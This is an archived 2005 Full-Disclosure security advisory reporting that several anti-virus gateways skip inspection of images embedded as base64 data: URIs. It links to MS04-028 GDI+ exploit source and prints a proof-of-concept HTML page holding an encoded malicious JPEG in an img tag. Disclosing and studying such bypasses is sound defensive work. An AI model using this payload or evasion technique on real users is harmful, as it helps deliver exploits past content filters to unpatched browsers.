[Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability

From: Darren Bounds (dbounds_at_intrusense.com)
Date: 01/10/05

  • Next message: Team SHATTER (Application Security, Inc.): "[Full-Disclosure] [AppSecInc Team SHATTER Security Advisory] Microsoft Windows LPC heap overflow" 
    Date: Mon, 10 Jan 2005 14:08:11 -0500
To: full-disclosure@lists.netsys.com, bugs@securitytracker.com, vulnwatch@vulnwatch.org, bugtraq@securityfocus.com, list@securiteam.com

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Multi-vendor AV gateway image inspection bypass vulnerability
    January 10, 2005

    A vulnerability has been discovered which allows a remote attacker to
    bypass anti-virus
    (as well other security technologies such as IDS and IPS) inspection of
    HTTP image content.

    By leveraging techniques described in RFC 2397 for base64 encoding
    image content within
    the URL scheme. A remote attack may encode a malicious image within the
    body of an HTML
    formatted document to circumvent content inspection.

    For example:

    http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php

    The source code at the URL above will by default create a JPEG image
    that will attempt (and fail
    without tweaking) to exploit the Microsoft MS04-028 GDI+ vulnerability.
    The image itself is detected
    by all AV gateway engines tested (Trend, Sophos and McAfee), however,
    when the same image
    is base64 encoded using the technique described in RFC 2397 (documented
    below), inspection
    is not performed and is delivered rendered by the client.

    While Microsoft Internet Explorer does not support the RFC 2397 URL
    scheme; Firefox, Safari,
    Mozilla and Opera do and will render the data and thus successfully
    execute the payload if the necessary
    OS and/or application patches have not been applied.

    ## BEGIN HTML ##

    <html>
    <body>
    <img
    src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
    gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
    /X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBwkJ
    CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv/b
    AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
    MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAAAAAAAAAA
    AQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGR
    oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2Rl
    ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbH
    yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEBAAAAAAAA
    AQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU
    QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNk
    ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TF
    xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD//
    Z">
    </body>
    </html>

    ## END HTML ##

    Solution:

    While AV vendor patches are not yet available, fixes for all currently
    known image vulnerabilities are
    and have been for several months. If you have not yet applied them,
    you have your own
    negligence to blame.

    Contributions:

    Thanks to Scott Roeder and Jacinto Rodriquez their assistance in
    platform testing.

    Thank you,

    Darren Bounds
    Intrusense, LLC.
    http://www.intrusense.com

    - --
    Intrusense - Securing Business As Usual
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.2.4 (Darwin)

    iD8DBQFB4tKesvxTSz2eaa8RAluUAKDmUsM6Hf+U321P/kALTC/rKwoLOwCfaK57
    XT6MWYJOH3FmLfV3B1UfuJA=
    =82yy
    -----END PGP SIGNATURE-----

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Team SHATTER (Application Security, Inc.): "[Full-Disclosure] [AppSecInc Team SHATTER Security Advisory] Microsoft Windows LPC heap overflow"

    Relevant Pages